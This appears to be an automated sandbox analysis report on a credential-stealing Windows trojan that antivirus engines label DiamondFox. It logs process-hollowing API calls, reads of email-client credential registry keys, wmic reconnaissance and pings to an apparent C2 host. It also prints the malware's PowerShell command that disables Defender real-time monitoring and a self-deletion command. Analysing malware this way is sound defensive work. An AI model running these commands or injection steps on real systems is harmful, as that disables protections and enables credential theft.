RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Harvests credentials from local email clients (6 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
registry	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (16 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 2988
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 2128
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 1836
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 1080
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 2060
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 1052
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 1812
Process injection	Process 540 called NtSetContextThread to modify thread in remote process 2728
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4482804 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003bc process_identifier: 2988	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198516 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003a8 process_identifier: 2128	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4275728 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003c4 process_identifier: 1836	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4473134 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000364 process_identifier: 1080	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198400 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003d4 process_identifier: 2060	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198584 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003d8 process_identifier: 1052	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198664 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003e0 process_identifier: 1812	1	0	0
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198400 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003e8 process_identifier: 2728	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\EdgeCP\8958C14E0407.exe

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (16 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 540 resumed a thread in remote process 2988
Process injection	Process 540 resumed a thread in remote process 2128
Process injection	Process 540 resumed a thread in remote process 1836
Process injection	Process 540 resumed a thread in remote process 1080
Process injection	Process 540 resumed a thread in remote process 2060
Process injection	Process 540 resumed a thread in remote process 1052
Process injection	Process 540 resumed a thread in remote process 1812
Process injection	Process 540 resumed a thread in remote process 2728
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003bc suspend_count: 1 process_identifier: 2988	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 2128	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003c4 suspend_count: 1 process_identifier: 1836	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x00000364 suspend_count: 1 process_identifier: 1080	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003d4 suspend_count: 1 process_identifier: 2060	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003d8 suspend_count: 1 process_identifier: 1052	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003e0 suspend_count: 1 process_identifier: 1812	1	0	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003e8 suspend_count: 1 process_identifier: 2728	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\recdisc.exe

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (50 out of 131 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1224 thread_handle: 0x000000d8 process_identifier: 540 current_directory: C:\Users\test22\AppData\Roaming\EdgeCP filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000000d4	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1160 thread_handle: 0x000000d4 process_identifier: 1756 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\test22\AppData\Local\Temp\microsoftedgecps.exe' -Force -Recurse filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000000d8	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1332 thread_handle: 0x000000d8 process_identifier: 2256 current_directory: filepath: track: 1 command_line: "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1 filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000000d4	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 2704 thread_handle: 0x000002a4 process_identifier: 2660 current_directory: filepath: track: 1 command_line: "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x00000394	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 804 thread_handle: 0x00000398 process_identifier: 2364 current_directory: filepath: track: 1 command_line: "wmic" os get caption /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 2236 thread_handle: 0x000003a0 process_identifier: 2800 current_directory: filepath: track: 1 command_line: "wmic" path win32_VideoController get caption /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x00000394	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 2832 thread_handle: 0x00000394 process_identifier: 2560 current_directory: filepath: track: 1 command_line: "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1460 thread_handle: 0x000003a0 process_identifier: 2892 current_directory: filepath: track: 1 command_line: "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x00000398	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 108 thread_handle: 0x00000394 process_identifier: 2444 current_directory: filepath: track: 1 command_line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1408 thread_handle: 0x000003a0 process_identifier: 2740 current_directory: filepath: track: 1 command_line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 1 process_handle: 0x00000398	1	1
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 900 thread_handle: 0x000003bc process_identifier: 2988 current_directory: filepath: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe track: 1 command_line: /scomma "C:\Users\test22\AppData\Local\Temp\1.log" filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000039c	1	1
NtGetContextThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003bc	1	0
NtUnmapViewOfSection June 29, 2021, 1:50 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2988 process_handle: 0x0000039c	1	0
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2988 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000039c	1	0
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $³Lî¨÷-û÷-û÷-û4"ßûõ-û4"Ýûá-û Àûü-û-ûü-û÷-û§,û ûô-ûÐëòûÍ-ûÐëüûö-ûÐëøûö-ûRich÷-ûPEL´Ë^àÐJôfà@Àáµlvð0 äàl.textJÏÐ `.rdataÊà®Ô@@.dataä@À.rsrc0@@ base_address: 0x00400000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00401000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x0044e000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00459000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00473000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2988 process_handle: 0x0000039c	1	1
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4482804 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003bc process_identifier: 2988	1	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003bc suspend_count: 1 process_identifier: 2988	1	0
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1684 thread_handle: 0x000003a8 process_identifier: 2128 current_directory: filepath: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe track: 1 command_line: /scomma "C:\Users\test22\AppData\Local\Temp\4.log" filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003a4	1	1
NtGetContextThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003a8	1	0
NtUnmapViewOfSection June 29, 2021, 1:50 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2128 process_handle: 0x000003a4	1	0
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2128 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a4	1	0
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPEL=/`àt0@PÇb'(@( 0.text `.dataÈ0@À.rsrc@@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00401000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00403000 process_identifier: 2128 process_handle: 0x000003a4		0
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00404000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2128 process_handle: 0x000003a4	1	1
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4198516 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003a8 process_identifier: 2128	1	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 2128	1	0
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 1048 thread_handle: 0x000003c4 process_identifier: 1836 current_directory: filepath: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe track: 1 command_line: /scomma "C:\Users\test22\AppData\Local\Temp\2.log" filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003c8	1	1
NtGetContextThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003c4	1	0
NtUnmapViewOfSection June 29, 2021, 1:50 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 1836 process_handle: 0x000003c8	1	0
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1836 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003c8	1	0
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $^ ¨kÆBkÆBkÆBÙdB kÆBàHBkÆBÀHÚBkÆBkÇB jÆBàHßBkÆB=´B/kÆB=ºBkÆB=¾BkÆBRichkÆBPEL»üiTà2¶>P@ øªÈð-ÀSP .textD12 `.rdataZP\6@@.data=°,@À.rsrc-ð.¾@@ base_address: 0x00400000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00401000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00415000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x0041b000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x0041f000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1836 process_handle: 0x000003c8	1	1
NtSetContextThread June 29, 2021, 1:50 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4275728 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003c4 process_identifier: 1836	1	0
NtResumeThread June 29, 2021, 1:50 p.m.	thread_handle: 0x000003c4 suspend_count: 1 process_identifier: 1836	1	0
CreateProcessInternalW June 29, 2021, 1:50 p.m.	thread_identifier: 2624 thread_handle: 0x00000364 process_identifier: 1080 current_directory: filepath: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe track: 1 command_line: /scomma "C:\Users\test22\AppData\Local\Temp\3.log" filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000036c	1	1
NtGetContextThread June 29, 2021, 1:50 p.m.	thread_handle: 0x00000364	1	0
NtUnmapViewOfSection June 29, 2021, 1:50 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 1080 process_handle: 0x0000036c	1	0
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1080 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1	0
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $G=°Â\Þ\Þ\ÞÀS\Þù\ÞÙÂ\Þ\ßA]ÞùÇ\Þ$¬*\Þ$¢\Þ$¦\ÞRich\ÞPEL;à]à:â.AP@PßîÏÜ .TPl.textÍ9: `.rdata\|P>@@.data .ðÖ@À.rsrc. 0ð@@ base_address: 0x00400000 process_identifier: 1080 process_handle: 0x0000036c	1	1

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Fugrafa.133115
ALYac	Gen:Variant.Fugrafa.133115
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Riskware ( 0040eff71 )
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.a30c9e
Arcabit	Trojan.Fugrafa.D207FB
Cyren	W32/Rbot.A.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.ACSB
APEX	Malicious
Kaspersky	Trojan.Win32.Snojan.ctjj
BitDefender	Gen:Variant.Fugrafa.133115
NANO-Antivirus	Trojan.Win32.SpyEyes.iukpuu
Avast	Win32:TrojanX-gen [Trj]
Rising	Backdoor.Diamondfox!1.D569 (CLASSIC)
Ad-Aware	Gen:Variant.Fugrafa.133115
Sophos	ML/PE-A
McAfee-GW-Edition	BehavesLike.Win32.Swizzor.dh
FireEye	Generic.mg.b2600237508f0a8e
Emsisoft	Gen:Variant.Fugrafa.133115 (B)
Jiangmin	Trojan.Snojan.dmo
Avira	HEUR/AGEN.1142606
Antiy-AVL	Trojan/Generic.ASMalwS.3377950
Microsoft	PWS:Win32/Zbot!ml
GData	Gen:Variant.Fugrafa.133115
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C4432449
Acronis	suspicious
McAfee	GenericRXOV-MJ!B2600237508F
MAX	malware (ai score=84)
VBA32	BScope.TrojanSpy.SpyEyes
Malwarebytes	Spyware.DiamondFox
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
BitDefenderTheta	Gen:NN.ZexaF.34770.mqW@aS!FA6g
AVG	Win32:TrojanX-gen [Trj]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_90% (D)
MaxSecure	Trojan.Malware.73764767.susgen

microsoftedgecps.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All